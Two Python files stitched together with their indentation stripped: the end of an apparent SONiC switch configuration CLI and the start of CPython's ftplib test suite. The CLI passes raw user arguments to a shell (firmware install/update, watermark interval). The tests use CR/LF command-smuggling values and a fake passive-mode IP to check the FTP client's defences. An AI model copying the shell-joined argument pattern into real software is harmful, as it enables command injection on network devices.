ctx.fail("Multiple or no entry in DEFAULT_LOSSLESS_BUFFER_PARAMETER found while no dynamic_th specified")
default_lossless_param = config_db.get_entry('DEFAULT_LOSSLESS_BUFFER_PARAMETER', keys[0])
if 'default_dynamic_th' in default_lossless_param.keys():
params['dynamic_th'] = default_lossless_param['default_dynamic_th']
else:
ctx.fail("No dynamic_th defined in DEFAULT_LOSSLESS_BUFFER_PARAMETER")
config_db.set_entry("BUFFER_PROFILE", (profile_name), params)
@profile.command('remove')
@click.argument('profile', metavar='<profile>', required=True)
@clicommon.pass_db
def remove_profile(db, profile):
"""Delete a buffer profile"""
config_db = db.cfgdb
ctx = click.get_current_context()
full_profile_name = '[BUFFER_PROFILE|{}]'.format(profile)
existing_pgs = config_db.get_table("BUFFER_PG")
for k, v in existing_pgs.items():
port, pg = k
referenced_profile = v.get('profile')
if referenced_profile and referenced_profile == full_profile_name:
ctx.fail("Profile {} is referenced by {}|{} and can't be removed".format(profile, port, pg))
entry = config_db.get_entry("BUFFER_PROFILE", profile)
if entry:
config_db.set_entry("BUFFER_PROFILE", profile, None)
else:
ctx.fail("Profile {} doesn't exist".format(profile))
#
# 'platform' group ('config platform ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
def platform():
"""Platform-related configuration tasks"""
# 'firmware' subgroup ("config platform firmware ...")
@platform.group(cls=clicommon.AbbreviationGroup)
def firmware():
"""Firmware configuration tasks"""
pass
# 'install' subcommand ("config platform firmware install")
@firmware.command(
context_settings=dict(
ignore_unknown_options=True,
allow_extra_args=True
),
add_help_option=False
)
@click.argument('args', nargs=-1, type=click.UNPROCESSED)
def install(args):
"""Install platform firmware"""
cmd = "fwutil install {}".format(" ".join(args))
try:
subprocess.check_call(cmd, shell=True)
except subprocess.CalledProcessError as e:
sys.exit(e.returncode)
# 'update' subcommand ("config platform firmware update")
@firmware.command(
context_settings=dict(
ignore_unknown_options=True,
allow_extra_args=True
),
add_help_option=False
)
@click.argument('args', nargs=-1, type=click.UNPROCESSED)
def update(args):
"""Update platform firmware"""
cmd = "fwutil update {}".format(" ".join(args))
try:
subprocess.check_call(cmd, shell=True)
except subprocess.CalledProcessError as e:
sys.exit(e.returncode)
#
# 'watermark' group ("show watermark telemetry interval")
#
@config.group(cls=clicommon.AbbreviationGroup)
def watermark():
"""Configure watermark """
pass
@watermark.group(cls=clicommon.AbbreviationGroup)
def telemetry():
"""Configure watermark telemetry"""
pass
@telemetry.command()
@click.argument('interval', required=True)
def interval(interval):
"""Configure watermark telemetry interval"""
command = 'watermarkcfg --config-interval ' + interval
clicommon.run_command(command)
#
# 'interface_naming_mode' subgroup ('config interface_naming_mode ...')
#
@config.group(cls=clicommon.AbbreviationGroup, name='interface_naming_mode')
def interface_naming_mode():
"""Modify interface naming mode for interacting with SONiC CLI"""
pass
@interface_naming_mode.command('default')
def naming_mode_default():
"""Set CLI interface naming mode to DEFAULT (SONiC port name)"""
set_interface_naming_mode('default')
@interface_naming_mode.command('alias')
def naming_mode_alias():
"""Set CLI interface naming mode to ALIAS (Vendor port alias)"""
set_interface_naming_mode('alias')
def is_loopback_name_valid(loopback_name):
"""Loopback name validation
"""
if loopback_name[:CFG_LOOPBACK_PREFIX_LEN] != CFG_LOOPBACK_PREFIX :
return False
if (loopback_name[CFG_LOOPBACK_PREFIX_LEN:].isdigit() is False or
int(loopback_name[CFG_LOOPBACK_PREFIX_LEN:]) > CFG_LOOPBACK_ID_MAX_VAL) :
return False
if len(loopback_name) > CFG_LOOPBACK_NAME_TOTAL_LEN_MAX:
return False
return True
#
# 'loopback' group ('config loopback ...')
#
@config.group()
@click.pass_context
@click.option('-s', '--redis-unix-socket-path', help='unix socket path for redis connection')
def loopback(ctx, redis_unix_socket_path):
"""Loopback-related configuration tasks"""
kwargs = {}
if redis_unix_socket_path:
kwargs['unix_socket_path'] = redis_unix_socket_path
config_db = ConfigDBConnector(**kwargs)
config_db.connect(wait_for_init=False)
ctx.obj = {'db': config_db}
@loopback.command('add')
@click.argument('loopback_name', metavar='<loopback_name>', required=True)
@click.pass_context
def add_loopback(ctx, loopback_name):
config_db = ctx.obj['db']
if is_loopback_name_valid(loopback_name) is False:
ctx.fail("{} is invalid, name should have prefix '{}' and suffix '{}' "
.format(loopback_name, CFG_LOOPBACK_PREFIX, CFG_LOOPBACK_NO))
lo_intfs = [k for k, v in config_db.get_table('LOOPBACK_INTERFACE').items() if type(k) != tuple]
if loopback_name in lo_intfs:
ctx.fail("{} already exists".format(loopback_name))
config_db.set_entry('LOOPBACK_INTERFACE', loopback_name, {"NULL" : "NULL"})
@loopback.command('del')
@click.argument('loopback_name', metavar='<loopback_name>', required=True)
@click.pass_context
def del_loopback(ctx, loopback_name):
config_db = ctx.obj['db']
if is_loopback_name_valid(loopback_name) is False:
ctx.fail("{} is invalid, name should have prefix '{}' and suffix '{}' "
.format(loopback_name, CFG_LOOPBACK_PREFIX, CFG_LOOPBACK_NO))
lo_config_db = config_db.get_table('LOOPBACK_INTERFACE')
lo_intfs = [k for k, v in lo_config_db.items() if type(k) != tuple]
if loopback_name not in lo_intfs:
ctx.fail("{} does not exists".format(loopback_name))
ips = [ k[1] for k in lo_config_db if type(k) == tuple and k[0] == loopback_name ]
for ip in ips:
config_db.set_entry('LOOPBACK_INTERFACE', (loopback_name, ip), None)
config_db.set_entry('LOOPBACK_INTERFACE', loopback_name, None)
@config.group(cls=clicommon.AbbreviationGroup)
def ztp():
""" Configure Zero Touch Provisioning """
if os.path.isfile('/usr/bin/ztp') is False:
exit("ZTP feature unavailable in this image version")
if os.geteuid() != 0:
exit("Root privileges are required for this operation")
@ztp.command()
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false,
expose_value=False, prompt='ZTP will be restarted. You may lose switch data and connectivity, continue?')
@click.argument('run', required=False, type=click.Choice(["run"]))
def run(run):
"""Restart ZTP of the device."""
command = "ztp run -y"
clicommon.run_command(command, display_cmd=True)
@ztp.command()
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false,
expose_value=False, prompt='Active ZTP session will be stopped and disabled, continue?')
@click.argument('disable', required=False, type=click.Choice(["disable"]))
def disable(disable):
"""Administratively Disable ZTP."""
command = "ztp disable -y"
clicommon.run_command(command, display_cmd=True)
@ztp.command()
@click.argument('enable', required=False, type=click.Choice(["enable"]))
def enable(enable):
"""Administratively Enable ZTP."""
command = "ztp enable"
clicommon.run_command(command, display_cmd=True)
#
# 'syslog' group ('config syslog ...')
#
@config.group(cls=clicommon.AbbreviationGroup, name='syslog')
@click.pass_context
def syslog_group(ctx):
"""Syslog server configuration tasks"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {'db': config_db}
@syslog_group.command('add')
@click.argument('syslog_ip_address', metavar='<syslog_ip_address>', required=True)
@click.pass_context
def add_syslog_server(ctx, syslog_ip_address):
""" Add syslog server IP """
if not clicommon.is_ipaddress(syslog_ip_address):
ctx.fail('Invalid ip address')
db = ctx.obj['db']
syslog_servers = db.get_table("SYSLOG_SERVER")
if syslog_ip_address in syslog_servers:
click.echo("Syslog server {} is already configured".format(syslog_ip_address))
return
else:
db.set_entry('SYSLOG_SERVER', syslog_ip_address, {'NULL': 'NULL'})
click.echo("Syslog server {} added to configuration".format(syslog_ip_address))
try:
click.echo("Restarting rsyslog-config service...")
clicommon.run_command("systemctl restart rsyslog-config", display_cmd=False)
except SystemExit as e:
ctx.fail("Restart service rsyslog-config failed with error {}".format(e))
@syslog_group.command('del')
@click.argument('syslog_ip_address', metavar='<syslog_ip_address>', required=True)
@click.pass_context
def del_syslog_server(ctx, syslog_ip_address):
""" Delete syslog server IP """
if not clicommon.is_ipaddress(syslog_ip_address):
ctx.fail('Invalid IP address')
db = ctx.obj['db']
syslog_servers = db.get_table("SYSLOG_SERVER")
if syslog_ip_address in syslog_servers:
db.set_entry('SYSLOG_SERVER', '{}'.format(syslog_ip_address), None)
click.echo("Syslog server {} removed from configuration".format(syslog_ip_address))
else:
ctx.fail("Syslog server {} is not configured.".format(syslog_ip_address))
try:
click.echo("Restarting rsyslog-config service...")
clicommon.run_command("systemctl restart rsyslog-config", display_cmd=False)
except SystemExit as e:
ctx.fail("Restart service rsyslog-config failed with error {}".format(e))
#
# 'ntp' group ('config ntp ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def ntp(ctx):
"""NTP server configuration tasks"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {'db': config_db}
@ntp.command('add')
@click.argument('ntp_ip_address', metavar='<ntp_ip_address>', required=True)
@click.pass_context
def add_ntp_server(ctx, ntp_ip_address):
""" Add NTP server IP """
if not clicommon.is_ipaddress(ntp_ip_address):
ctx.fail('Invalid ip address')
db = ctx.obj['db']
ntp_servers = db.get_table("NTP_SERVER")
if ntp_ip_address in ntp_servers:
click.echo("NTP server {} is already configured".format(ntp_ip_address))
return
else:
db.set_entry('NTP_SERVER', ntp_ip_address, {'NULL': 'NULL'})
click.echo("NTP server {} added to configuration".format(ntp_ip_address))
try:
click.echo("Restarting ntp-config service...")
clicommon.run_command("systemctl restart ntp-config", display_cmd=False)
except SystemExit as e:
ctx.fail("Restart service ntp-config failed with error {}".format(e))
@ntp.command('del')
@click.argument('ntp_ip_address', metavar='<ntp_ip_address>', required=True)
@click.pass_context
def del_ntp_server(ctx, ntp_ip_address):
""" Delete NTP server IP """
if not clicommon.is_ipaddress(ntp_ip_address):
ctx.fail('Invalid IP address')
db = ctx.obj['db']
ntp_servers = db.get_table("NTP_SERVER")
if ntp_ip_address in ntp_servers:
db.set_entry('NTP_SERVER', '{}'.format(ntp_ip_address), None)
click.echo("NTP server {} removed from configuration".format(ntp_ip_address))
else:
ctx.fail("NTP server {} is not configured.".format(ntp_ip_address))
try:
click.echo("Restarting ntp-config service...")
clicommon.run_command("systemctl restart ntp-config", display_cmd=False)
except SystemExit as e:
ctx.fail("Restart service ntp-config failed with error {}".format(e))
#
# 'sflow' group ('config sflow ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def sflow(ctx):
"""sFlow-related configuration tasks"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {'db': config_db}
#
# 'sflow' command ('config sflow enable')
#
@sflow.command()
@click.pass_context
def enable(ctx):
"""Enable sFlow"""
config_db = ctx.obj['db']
sflow_tbl = config_db.get_table('SFLOW')
if not sflow_tbl:
sflow_tbl = {'global': {'admin_state': 'up'}}
else:
sflow_tbl['global']['admin_state'] = 'up'
config_db.mod_entry('SFLOW', 'global', sflow_tbl['global'])
try:
proc = subprocess.Popen("systemctl is-active sflow", shell=True, text=True, stdout=subprocess.PIPE)
(out, err) = proc.communicate()
except SystemExit as e:
ctx.fail("Unable to check sflow status {}".format(e))
if out != "active":
log.log_info("sflow service is not enabled. Starting sflow docker...")
clicommon.run_command("sudo systemctl enable sflow")
clicommon.run_command("sudo systemctl start sflow")
#
# 'sflow' command ('config sflow disable')
#
@sflow.command()
@click.pass_context
def disable(ctx):
"""Disable sFlow"""
config_db = ctx.obj['db']
sflow_tbl = config_db.get_table('SFLOW')
if not sflow_tbl:
sflow_tbl = {'global': {'admin_state': 'down'}}
else:
sflow_tbl['global']['admin_state'] = 'down'
config_db.mod_entry('SFLOW', 'global', sflow_tbl['global'])
#
# 'sflow' command ('config sflow polling-interval ...')
#
@sflow.command('polling-interval')
@click.argument('interval', metavar='<polling_interval>', required=True,
type=int)
@click.pass_context
def polling_int(ctx, interval):
"""Set polling-interval for counter-sampling (0 to disable)"""
if interval not in range(5, 301) and interval != 0:
click.echo("Polling interval must be between 5-300 (0 to disable)")
config_db = ctx.obj['db']
sflow_tbl = config_db.get_table('SFLOW')
if not sflow_tbl:
sflow_tbl = {'global': {'admin_state': 'down'}}
sflow_tbl['global']['polling_interval'] = interval
config_db.mod_entry('SFLOW', 'global', sflow_tbl['global'])
def is_valid_sample_rate(rate):
return rate in range(256, 8388608 + 1)
#
# 'sflow interface' group
#
@sflow.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def interface(ctx):
"""Configure sFlow settings for an interface"""
pass
#
# 'sflow' command ('config sflow interface enable ...')
#
@interface.command()
@click.argument('ifname', metavar='<interface_name>', required=True, type=str)
@click.pass_context
def enable(ctx, ifname):
config_db = ctx.obj['db']
if not interface_name_is_valid(config_db, ifname) and ifname != 'all':
click.echo("Invalid interface name")
return
intf_dict = config_db.get_table('SFLOW_SESSION')
if intf_dict and ifname in intf_dict:
intf_dict[ifname]['admin_state'] = 'up'
config_db.mod_entry('SFLOW_SESSION', ifname, intf_dict[ifname])
else:
config_db.mod_entry('SFLOW_SESSION', ifname, {'admin_state': 'up'})
#
# 'sflow' command ('config sflow interface disable ...')
#
@interface.command()
@click.argument('ifname', metavar='<interface_name>', required=True, type=str)
@click.pass_context
def disable(ctx, ifname):
config_db = ctx.obj['db']
if not interface_name_is_valid(config_db, ifname) and ifname != 'all':
click.echo("Invalid interface name")
return
intf_dict = config_db.get_table('SFLOW_SESSION')
if intf_dict and ifname in intf_dict:
intf_dict[ifname]['admin_state'] = 'down'
config_db.mod_entry('SFLOW_SESSION', ifname, intf_dict[ifname])
else:
config_db.mod_entry('SFLOW_SESSION', ifname,
{'admin_state': 'down'})
#
# 'sflow' command ('config sflow interface sample-rate ...')
#
@interface.command('sample-rate')
@click.argument('ifname', metavar='<interface_name>', required=True, type=str)
@click.argument('rate', metavar='<sample_rate>', required=True, type=int)
@click.pass_context
def sample_rate(ctx, ifname, rate):
config_db = ctx.obj['db']
if not interface_name_is_valid(config_db, ifname) and ifname != 'all':
click.echo('Invalid interface name')
return
if not is_valid_sample_rate(rate):
click.echo('Error: Sample rate must be between 256 and 8388608')
return
sess_dict = config_db.get_table('SFLOW_SESSION')
if sess_dict and ifname in sess_dict:
sess_dict[ifname]['sample_rate'] = rate
config_db.mod_entry('SFLOW_SESSION', ifname, sess_dict[ifname])
else:
config_db.mod_entry('SFLOW_SESSION', ifname, {'sample_rate': rate})
#
# 'sflow collector' group
#
@sflow.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def collector(ctx):
"""Add/Delete a sFlow collector"""
pass
def is_valid_collector_info(name, ip, port, vrf_name):
if len(name) > 16:
click.echo("Collector name must not exceed 16 characters")
return False
if port not in range(0, 65535 + 1):
click.echo("Collector port number must be between 0 and 65535")
return False
if not clicommon.is_ipaddress(ip):
click.echo("Invalid IP address")
return False
if vrf_name != 'default' and vrf_name != 'mgmt':
click.echo("Only 'default' and 'mgmt' VRF are supported")
return False
return True
#
# 'sflow' command ('config sflow collector add ...')
#
@collector.command()
@click.option('--port', required=False, type=int, default=6343,
help='Collector port number')
@click.option('--vrf', required=False, type=str, default='default',
help='Collector VRF')
@click.argument('name', metavar='<collector_name>', required=True)
@click.argument('ipaddr', metavar='<IPv4/v6_address>', required=True)
@click.pass_context
def add(ctx, name, ipaddr, port, vrf):
"""Add a sFlow collector"""
ipaddr = ipaddr.lower()
if not is_valid_collector_info(name, ipaddr, port, vrf):
return
config_db = ctx.obj['db']
collector_tbl = config_db.get_table('SFLOW_COLLECTOR')
if (collector_tbl and name not in collector_tbl and len(collector_tbl) == 2):
click.echo("Only 2 collectors can be configured, please delete one")
return
config_db.mod_entry('SFLOW_COLLECTOR', name,
{"collector_ip": ipaddr, "collector_port": port,
"collector_vrf": vrf})
return
#
# 'sflow' command ('config sflow collector del ...')
#
@collector.command('del')
@click.argument('name', metavar='<collector_name>', required=True)
@click.pass_context
def del_collector(ctx, name):
"""Delete a sFlow collector"""
config_db = ctx.obj['db']
collector_tbl = config_db.get_table('SFLOW_COLLECTOR')
if name not in collector_tbl:
click.echo("Collector: {} not configured".format(name))
return
config_db.mod_entry('SFLOW_COLLECTOR', name, None)
#
# 'sflow agent-id' group
#
@sflow.group(cls=clicommon.AbbreviationGroup, name='agent-id')
@click.pass_context
def agent_id(ctx):
"""Add/Delete a sFlow agent"""
pass
#
# 'sflow' command ('config sflow agent-id add ...')
#
@agent_id.command()
@click.argument('ifname', metavar='<interface_name>', required=True)
@click.pass_context
def add(ctx, ifname):
"""Add sFlow agent information"""
if ifname not in netifaces.interfaces():
click.echo("Invalid interface name")
return
config_db = ctx.obj['db']
sflow_tbl = config_db.get_table('SFLOW')
if not sflow_tbl:
sflow_tbl = {'global': {'admin_state': 'down'}}
if 'agent_id' in sflow_tbl['global']:
click.echo("Agent already configured. Please delete it first.")
return
sflow_tbl['global']['agent_id'] = ifname
config_db.mod_entry('SFLOW', 'global', sflow_tbl['global'])
#
# 'sflow' command ('config sflow agent-id del')
#
@agent_id.command('del')
@click.pass_context
def delete(ctx):
"""Delete sFlow agent information"""
config_db = ctx.obj['db']
sflow_tbl = config_db.get_table('SFLOW')
if not sflow_tbl:
sflow_tbl = {'global': {'admin_state': 'down'}}
if 'agent_id' not in sflow_tbl['global']:
click.echo("sFlow agent not configured.")
return
sflow_tbl['global'].pop('agent_id')
config_db.set_entry('SFLOW', 'global', sflow_tbl['global'])
if __name__ == '__main__':
config()
|
test_ftplib.py
|
"""Test script for ftplib module."""
# Modified by Giampaolo Rodola' to test FTP class, IPv6 and TLS
# environment
import ftplib
import asyncore
import asynchat
import socket
import io
import errno
import os
import threading
import time
try:
import ssl
except ImportError:
ssl = None
from unittest import TestCase, skipUnless
from test import support
from test.support import HOST, HOSTv6
TIMEOUT = 3
# the dummy data returned by server over the data channel when
# RETR, LIST, NLST, MLSD commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
MLSD_DATA = ("type=cdir;perm=el;unique==keVO1+ZF4; test\r\n"
"type=pdir;perm=e;unique==keVO1+d?3; ..\r\n"
"type=OS.unix=slink:/foobar;perm=;unique==keVO1+4G4; foobar\r\n"
"type=OS.unix=chr-13/29;perm=;unique==keVO1+5G4; device\r\n"
"type=OS.unix=blk-11/108;perm=;unique==keVO1+6G4; block\r\n"
"type=file;perm=awr;unique==keVO1+8G4; writable\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; promiscuous\r\n"
"type=dir;perm=;unique==keVO1+1t2; no-exec\r\n"
"type=file;perm=r;unique==keVO1+EG4; two words\r\n"
"type=file;perm=r;unique==keVO1+IH4; leading space\r\n"
"type=file;perm=r;unique==keVO1+1G4; file1\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; incoming\r\n"
"type=file;perm=r;unique==keVO1+1G4; file2\r\n"
"type=file;perm=r;unique==keVO1+1G4; file3\r\n"
"type=file;perm=r;unique==keVO1+1G4; file4\r\n")
class DummyDTPHandler(asynchat.async_chat):
dtp_conn_closed = False
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
def handle_read(self):
self.baseclass.last_received_data += self.recv(1024).decode('ascii')
def handle_close(self):
# XXX: this method can be called many times in a row for a single
# connection, including in clear-text (non-TLS) mode.
# (behaviour witnessed with test_data_connection)
if not self.dtp_conn_closed:
self.baseclass.push('226 transfer complete')
self.close()
self.dtp_conn_closed = True
def push(self, what):
if self.baseclass.next_data is not None:
what = self.baseclass.next_data
self.baseclass.next_data = None
if not what:
return self.close_when_done()
super(DummyDTPHandler, self).push(what.encode('ascii'))
def handle_error(self):
raise Exception
class DummyFTPHandler(asynchat.async_chat):
dtp_handler = DummyDTPHandler
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
# tells the socket to handle urgent data inline (ABOR command)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_OOBINLINE, 1)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.next_data = None
self.rest = None
self.next_retr_data = RETR_DATA
self.push('220 welcome')
# We use this as the string IPv4 address to direct the client
# to in response to a PASV command. To test security behavior.
# https://bugs.python.org/issue43285/.
self.fake_pasv_server_ip = '252.253.254.255'
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer).decode('ascii')
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise Exception
def push(self, data):
asynchat.async_chat.push(self, data.encode('ascii') + b'\r\n')
def cmd_port(self, arg):
addr = list(map(int, arg.split(',')))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
with socket.create_server((self.socket.getsockname()[0], 0)) as sock:
sock.settimeout(TIMEOUT)
port = sock.getsockname()[1]
ip = self.fake_pasv_server_ip
ip = ip.replace('.', ','); p1 = port / 256; p2 = port % 256
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
with socket.create_server((self.socket.getsockname()[0], 0),
family=socket.AF_INET6) as sock:
sock.settimeout(TIMEOUT)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_noop(self, arg):
self.push('200 noop ok')
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_abor(self, arg):
self.push('226 abor ok')
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_rest(self, arg):
self.rest = arg
self.push('350 rest ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
if self.rest is not None:
offset = int(self.rest)
else:
offset = 0
self.dtp.push(self.next_retr_data[offset:])
self.dtp.close_when_done()
self.rest = None
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
def cmd_opts(self, arg):
self.push('200 opts ok')
def cmd_mlsd(self, arg):
self.push('125 mlsd ok')
self.dtp.push(MLSD_DATA)
self.dtp.close_when_done()
def cmd_setlongretr(self, arg):
# For testing. Next RETR will return long line.
self.next_retr_data = 'x' * int(arg)
self.push('125 setlongretr ok')
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.daemon = True
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise Exception
if ssl is not None:
CERTFILE = os.path.join(os.path.dirname(__file__), "keycert3.pem")
CAFILE = os.path.join(os.path.dirname(__file__), "pycacert.pem")
class SSLConnection(asyncore.dispatcher):
"""An asyncore.dispatcher subclass supporting TLS/SSL."""
_ssl_accepting = False
_ssl_closing = False
def secure_connection(self):
context = ssl.SSLContext()
context.load_cert_chain(CERTFILE)
socket = context.wrap_socket(self.socket,
suppress_ragged_eofs=False,
server_side=True,
do_handshake_on_connect=False)
self.del_channel()
self.set_socket(socket)
self._ssl_accepting = True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
# TODO: SSLError does not expose alert information
elif "SSLV3_ALERT_BAD_CERTIFICATE" in err.args[1]:
return self.handle_close()
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def _do_ssl_shutdown(self):
self._ssl_closing = True
try:
self.socket = self.socket.unwrap()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
except OSError as err:
# Any "socket error" corresponds to a SSL_ERROR_SYSCALL return
# from OpenSSL's SSL_shutdown(), corresponding to a
# closed socket condition. See also:
# http://www.mail-archive.com/openssl-users@openssl.org/msg60710.html
pass
self._ssl_closing = False
if getattr(self, '_ccc', False) is False:
super(SSLConnection, self).close()
else:
pass
def handle_read_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_read_event()
def handle_write_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_write_event()
def send(self, data):
try:
return super(SSLConnection, self).send(data)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN,
ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return 0
raise
def recv(self, buffer_size):
try:
return super(SSLConnection, self).recv(buffer_size)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return b''
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN):
self.handle_close()
return b''
raise
def handle_error(self):
raise Exception
def close(self):
if (isinstance(self.socket, ssl.SSLSocket) and
self.socket._sslobj is not None):
self._do_ssl_shutdown()
else:
super(SSLConnection, self).close()
class DummyTLS_DTPHandler(SSLConnection, DummyDTPHandler):
"""A DummyDTPHandler subclass supporting TLS/SSL."""
def __init__(self, conn, baseclass):
DummyDTPHandler.__init__(self, conn, baseclass)
if self.baseclass.secure_data_channel:
self.secure_connection()
class DummyTLS_FTPHandler(SSLConnection, DummyFTPHandler):
"""A DummyFTPHandler subclass supporting TLS/SSL."""
dtp_handler = DummyTLS_DTPHandler
def __init__(self, conn):
DummyFTPHandler.__init__(self, conn)
self.secure_data_channel = False
self._ccc = False
def cmd_auth(self, line):
"""Set up secure control channel."""
self.push('234 AUTH TLS successful')
self.secure_connection()
def cmd_ccc(self, line):
self.push('220 Reverting back to clear-text')
self._ccc = True
self._do_ssl_shutdown()
def cmd_pbsz(self, line):
"""Negotiate size of buffer for secure data transfer.
For TLS/SSL the only valid value for the parameter is '0'.
Any other value is accepted but ignored.
"""
self.push('200 PBSZ=0 successful.')
def cmd_prot(self, line):
"""Setup un/secure data channel."""
arg = line.upper()
if arg == 'C':
self.push('200 Protection set to Clear')
self.secure_data_channel = False
elif arg == 'P':
self.push('200 Protection set to Private')
self.secure_data_channel = True
else:
self.push("502 Unrecognized PROT type (use C or P).")
class DummyTLS_FTPServer(DummyFTPServer):
handler = DummyTLS_FTPHandler
class TestFTPClass(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
asyncore.close_all(ignore_all=True)
def check_data(self, received, expected):
self.assertEqual(len(received), len(expected))
self.assertEqual(received, expected)
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\r\n0')
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\n0')
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\r0')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
